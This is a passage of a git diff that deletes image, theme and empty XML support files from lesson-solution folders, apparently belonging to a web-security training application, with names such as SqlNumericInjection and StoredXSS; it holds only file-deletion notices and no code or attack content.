index 61f7e63a1..000000000
Binary files a/src/main/webapp/lesson_solutions/SilentTransactions_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SilentTransactions_files/image003.png b/src/main/webapp/lesson_solutions/SilentTransactions_files/image003.png
deleted file mode 100644
index faf59c077..000000000
Binary files a/src/main/webapp/lesson_solutions/SilentTransactions_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SilentTransactions_files/image005.png b/src/main/webapp/lesson_solutions/SilentTransactions_files/image005.png
deleted file mode 100644
index 4f4f0608a..000000000
Binary files a/src/main/webapp/lesson_solutions/SilentTransactions_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SilentTransactions_files/image007.png b/src/main/webapp/lesson_solutions/SilentTransactions_files/image007.png
deleted file mode 100644
index 04494b197..000000000
Binary files a/src/main/webapp/lesson_solutions/SilentTransactions_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SilentTransactions_files/image009.jpg b/src/main/webapp/lesson_solutions/SilentTransactions_files/image009.jpg
deleted file mode 100644
index b2529e37c..000000000
Binary files a/src/main/webapp/lesson_solutions/SilentTransactions_files/image009.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SilentTransactions_files/image010.jpg b/src/main/webapp/lesson_solutions/SilentTransactions_files/image010.jpg
deleted file mode 100644
index da2d8692a..000000000
Binary files a/src/main/webapp/lesson_solutions/SilentTransactions_files/image010.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SilentTransactions_files/image011.jpg b/src/main/webapp/lesson_solutions/SilentTransactions_files/image011.jpg
deleted file mode 100644
index efdefff06..000000000
Binary files a/src/main/webapp/lesson_solutions/SilentTransactions_files/image011.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SilentTransactions_files/image012.jpg b/src/main/webapp/lesson_solutions/SilentTransactions_files/image012.jpg
deleted file mode 100644
index 8375ab7cd..000000000
Binary files a/src/main/webapp/lesson_solutions/SilentTransactions_files/image012.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SilentTransactions_files/themedata.thmx b/src/main/webapp/lesson_solutions/SilentTransactions_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/SilentTransactions_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/SoapRequest_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/SoapRequest_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/filelist.xml b/src/main/webapp/lesson_solutions/SoapRequest_files/filelist.xml
deleted file mode 100644
index 2c3012bc9..000000000
--- a/src/main/webapp/lesson_solutions/SoapRequest_files/filelist.xml
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/image001.png b/src/main/webapp/lesson_solutions/SoapRequest_files/image001.png
deleted file mode 100644
index baa4ba50f..000000000
Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/image002.jpg b/src/main/webapp/lesson_solutions/SoapRequest_files/image002.jpg
deleted file mode 100644
index f9ab80c9b..000000000
Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/image003.png b/src/main/webapp/lesson_solutions/SoapRequest_files/image003.png
deleted file mode 100644
index ab5ed9af8..000000000
Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/image004.jpg b/src/main/webapp/lesson_solutions/SoapRequest_files/image004.jpg
deleted file mode 100644
index c12c37f71..000000000
Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/image004.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/image005.png b/src/main/webapp/lesson_solutions/SoapRequest_files/image005.png
deleted file mode 100644
index f46b3b8f7..000000000
Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/image006.jpg b/src/main/webapp/lesson_solutions/SoapRequest_files/image006.jpg
deleted file mode 100644
index d7c4069ba..000000000
Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/image006.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/image007.png b/src/main/webapp/lesson_solutions/SoapRequest_files/image007.png
deleted file mode 100644
index a841fc1d5..000000000
Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/image008.jpg b/src/main/webapp/lesson_solutions/SoapRequest_files/image008.jpg
deleted file mode 100644
index 2d4b523a5..000000000
Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/image008.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/image009.png b/src/main/webapp/lesson_solutions/SoapRequest_files/image009.png
deleted file mode 100644
index 2b7656cc1..000000000
Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/image010.jpg b/src/main/webapp/lesson_solutions/SoapRequest_files/image010.jpg
deleted file mode 100644
index 910fb47dc..000000000
Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/image010.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/image011.jpg b/src/main/webapp/lesson_solutions/SoapRequest_files/image011.jpg
deleted file mode 100644
index fc258a811..000000000
Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/image011.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/themedata.thmx b/src/main/webapp/lesson_solutions/SoapRequest_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SqlAddData_files/image001.jpg b/src/main/webapp/lesson_solutions/SqlAddData_files/image001.jpg
deleted file mode 100644
index 025d0c4c0..000000000
Binary files a/src/main/webapp/lesson_solutions/SqlAddData_files/image001.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SqlModifyData_files/image001.jpg b/src/main/webapp/lesson_solutions/SqlModifyData_files/image001.jpg
deleted file mode 100644
index 0b5b82073..000000000
Binary files a/src/main/webapp/lesson_solutions/SqlModifyData_files/image001.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/SqlNumericInjection_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/filelist.xml b/src/main/webapp/lesson_solutions/SqlNumericInjection_files/filelist.xml
deleted file mode 100644
index ce53b8ce8..000000000
--- a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/filelist.xml
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image001.png b/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image001.png
deleted file mode 100644
index 4876d330e..000000000
Binary files a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image002.jpg b/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image002.jpg
deleted file mode 100644
index 11fa10d47..000000000
Binary files a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image003.png b/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image003.png
deleted file mode 100644
index 272aa8b2b..000000000
Binary files a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image004.jpg b/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image004.jpg
deleted file mode 100644
index 38109d42f..000000000
Binary files a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image004.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image005.png b/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image005.png
deleted file mode 100644
index f2868eb02..000000000
Binary files a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image006.jpg b/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image006.jpg
deleted file mode 100644
index eb31b8e72..000000000
Binary files a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image006.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/numericinjection.png b/src/main/webapp/lesson_solutions/SqlNumericInjection_files/numericinjection.png
deleted file mode 100644
index bbafec0a6..000000000
Binary files a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/numericinjection.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/numericinjection_solved.png b/src/main/webapp/lesson_solutions/SqlNumericInjection_files/numericinjection_solved.png
deleted file mode 100644
index 54ef52882..000000000
Binary files a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/numericinjection_solved.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/themedata.thmx b/src/main/webapp/lesson_solutions/SqlNumericInjection_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SqlStringInjection_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/SqlStringInjection_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/SqlStringInjection_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/SqlStringInjection_files/themedata.thmx b/src/main/webapp/lesson_solutions/SqlStringInjection_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/SqlStringInjection_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/StoredXSS_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/StoredXSS_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/StoredXSS_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/StoredXSS_files/filelist.xml b/src/main/webapp/lesson_solutions/StoredXSS_files/filelist.xml
deleted file mode 100644
index a3cfc699b..000000000
--- a/src/main/webapp/lesson_solutions/StoredXSS_files/filelist.xml
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/StoredXSS_files/image001.png b/src/main/webapp/lesson_solutions/StoredXSS_files/image001.png
deleted file mode 100644
index 1ad882b5f..000000000
Binary files a/src/main/webapp/lesson_solutions/StoredXSS_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/StoredXSS_files/image003.png b/src/main/webapp/lesson_solutions/StoredXSS_files/image003.png
deleted file mode 100644
index d44ec5c39..000000000
Binary files a/src/main/webapp/lesson_solutions/StoredXSS_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/StoredXSS_files/image005.png b/src/main/webapp/lesson_solutions/StoredXSS_files/image005.png
deleted file mode 100644
index 5a5d10342..000000000
Binary files a/src/main/webapp/lesson_solutions/StoredXSS_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/StoredXSS_files/image007.jpg b/src/main/webapp/lesson_solutions/StoredXSS_files/image007.jpg
deleted file mode 100644
index ca84b8469..000000000
Binary files a/src/main/webapp/lesson_solutions/StoredXSS_files/image007.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/StoredXSS_files/image008.jpg b/src/main/webapp/lesson_solutions/StoredXSS_files/image008.jpg
deleted file mode 100644
index 8ece60e0a..000000000
Binary files a/src/main/webapp/lesson_solutions/StoredXSS_files/image008.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/StoredXSS_files/image009.jpg b/src/main/webapp/lesson_solutions/StoredXSS_files/image009.jpg
deleted file mode 100644
index c0313ee42..000000000
Binary files a/src/main/webapp/lesson_solutions/StoredXSS_files/image009.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/StoredXSS_files/themedata.thmx b/src/main/webapp/lesson_solutions/StoredXSS_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/StoredXSS_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/filelist.xml b/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/filelist.xml
deleted file mode 100644
index 010502f71..000000000
--- a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/filelist.xml
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image001.png b/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image001.png
deleted file mode 100644
index 398af0841..000000000
Binary files a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image002.jpg b/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image002.jpg
deleted file mode 100644
index 52526d118..000000000
Binary files a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image003.png b/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image003.png
deleted file mode 100644
index d22701fe3..000000000
Binary files a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image004.jpg b/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image004.jpg
deleted file mode 100644
index 4b222b8f0..000000000
Binary files a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image004.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image007.png b/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image007.png
deleted file mode 100644
index 8c9ea75b7..000000000
Binary files a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image009.jpg b/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image009.jpg
deleted file mode 100644
index 6a1c67f50..000000000
Binary files a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image009.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/themedata.thmx b/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/TraceXSS_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/TraceXSS_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/TraceXSS_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/TraceXSS_files/filelist.xml b/src/main/webapp/lesson_solutions/TraceXSS_files/filelist.xml
deleted file mode 100644
index 90de9a7db..000000000
--- a/src/main/webapp/lesson_solutions/TraceXSS_files/filelist.xml
+++ /dev/null
@@ -1,8 +0,0 @@
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/TraceXSS_files/image001.png b/src/main/webapp/lesson_solutions/TraceXSS_files/image001.png
deleted file mode 100644
index 1a73bd667..000000000
Binary files a/src/main/webapp/lesson_solutions/TraceXSS_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/TraceXSS_files/image002.jpg b/src/main/webapp/lesson_solutions/TraceXSS_files/image002.jpg
deleted file mode 100644
index fd3b3d48e..000000000
Binary files a/src/main/webapp/lesson_solutions/TraceXSS_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/TraceXSS_files/themedata.thmx b/src/main/webapp/lesson_solutions/TraceXSS_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/TraceXSS_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/UncheckedEmail_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/UncheckedEmail_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/UncheckedEmail_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/UncheckedEmail_files/filelist.xml b/src/main/webapp/lesson_solutions/UncheckedEmail_files/filelist.xml
deleted file mode 100644
index 679895ff7..000000000
--- a/src/main/webapp/lesson_solutions/UncheckedEmail_files/filelist.xml
+++ /dev/null
@@ -1,14 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image001.png b/src/main/webapp/lesson_solutions/UncheckedEmail_files/image001.png
deleted file mode 100644
index 4c5655e62..000000000
Binary files a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image002.jpg b/src/main/webapp/lesson_solutions/UncheckedEmail_files/image002.jpg
deleted file mode 100644
index 62a30cf94..000000000
Binary files a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image003.png b/src/main/webapp/lesson_solutions/UncheckedEmail_files/image003.png
deleted file mode 100644
index 8fd3ad15c..000000000
Binary files a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image004.jpg b/src/main/webapp/lesson_solutions/UncheckedEmail_files/image004.jpg
deleted file mode 100644
index 2a5943d8f..000000000
Binary files a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image004.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image005.png b/src/main/webapp/lesson_solutions/UncheckedEmail_files/image005.png
deleted file mode 100644
index 861f3dc14..000000000
Binary files a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image006.jpg b/src/main/webapp/lesson_solutions/UncheckedEmail_files/image006.jpg
deleted file mode 100644
index fae87c128..000000000
Binary files a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image006.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image007.png b/src/main/webapp/lesson_solutions/UncheckedEmail_files/image007.png
deleted file mode 100644
index 46049533d..000000000
Binary files a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image008.jpg b/src/main/webapp/lesson_solutions/UncheckedEmail_files/image008.jpg
deleted file mode 100644
index fe5aa8442..000000000
Binary files a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image008.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/UncheckedEmail_files/themedata.thmx b/src/main/webapp/lesson_solutions/UncheckedEmail_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/UncheckedEmail_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WSDLScanning_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/WSDLScanning_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/WSDLScanning_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/WSDLScanning_files/filelist.xml b/src/main/webapp/lesson_solutions/WSDLScanning_files/filelist.xml
deleted file mode 100644
index 5f46ccf32..000000000
--- a/src/main/webapp/lesson_solutions/WSDLScanning_files/filelist.xml
+++ /dev/null
@@ -1,14 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/WSDLScanning_files/image001.png b/src/main/webapp/lesson_solutions/WSDLScanning_files/image001.png
deleted file mode 100644
index 3268c9b0a..000000000
Binary files a/src/main/webapp/lesson_solutions/WSDLScanning_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WSDLScanning_files/image003.png b/src/main/webapp/lesson_solutions/WSDLScanning_files/image003.png
deleted file mode 100644
index 25ea1988a..000000000
Binary files a/src/main/webapp/lesson_solutions/WSDLScanning_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WSDLScanning_files/image005.png b/src/main/webapp/lesson_solutions/WSDLScanning_files/image005.png
deleted file mode 100644
index 63f42f9de..000000000
Binary files a/src/main/webapp/lesson_solutions/WSDLScanning_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WSDLScanning_files/image007.png b/src/main/webapp/lesson_solutions/WSDLScanning_files/image007.png
deleted file mode 100644
index 9ca7703d6..000000000
Binary files a/src/main/webapp/lesson_solutions/WSDLScanning_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WSDLScanning_files/image009.jpg b/src/main/webapp/lesson_solutions/WSDLScanning_files/image009.jpg
deleted file mode 100644
index fb0e23ea9..000000000
Binary files a/src/main/webapp/lesson_solutions/WSDLScanning_files/image009.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WSDLScanning_files/image010.jpg b/src/main/webapp/lesson_solutions/WSDLScanning_files/image010.jpg
deleted file mode 100644
index cb7259343..000000000
Binary files a/src/main/webapp/lesson_solutions/WSDLScanning_files/image010.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WSDLScanning_files/image011.jpg b/src/main/webapp/lesson_solutions/WSDLScanning_files/image011.jpg
deleted file mode 100644
index 300095af6..000000000
Binary files a/src/main/webapp/lesson_solutions/WSDLScanning_files/image011.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WSDLScanning_files/image012.jpg b/src/main/webapp/lesson_solutions/WSDLScanning_files/image012.jpg
deleted file mode 100644
index 2d00abf25..000000000
Binary files a/src/main/webapp/lesson_solutions/WSDLScanning_files/image012.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WSDLScanning_files/themedata.thmx b/src/main/webapp/lesson_solutions/WSDLScanning_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/WSDLScanning_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/filelist.xml b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/filelist.xml
deleted file mode 100644
index ce42de1c0..000000000
--- a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/filelist.xml
+++ /dev/null
@@ -1,24 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image001.png b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image001.png
deleted file mode 100644
index edac8c19a..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image003.png b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image003.png
deleted file mode 100644
index 0306a8f1f..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image005.png b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image005.png
deleted file mode 100644
index 7afb889fe..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image007.png b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image007.png
deleted file mode 100644
index 5c6c3d9c8..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image009.png b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image009.png
deleted file mode 100644
index 6d110d265..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image011.png b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image011.png
deleted file mode 100644
index 6831d62bf..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image011.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image013.png b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image013.png
deleted file mode 100644
index c04235add..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image013.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image015.png b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image015.png
deleted file mode 100644
index b0a6eceb4..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image015.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image017.png b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image017.png
deleted file mode 100644
index 78a1feb74..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image017.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image019.jpg b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image019.jpg
deleted file mode 100644
index a6e68a265..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image019.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image020.jpg b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image020.jpg
deleted file mode 100644
index 338a42ed8..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image020.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image021.jpg b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image021.jpg
deleted file mode 100644
index c1662c8f0..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image021.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image022.jpg b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image022.jpg
deleted file mode 100644
index 96f7253fd..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image022.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image023.jpg b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image023.jpg
deleted file mode 100644
index c856ee032..000000000
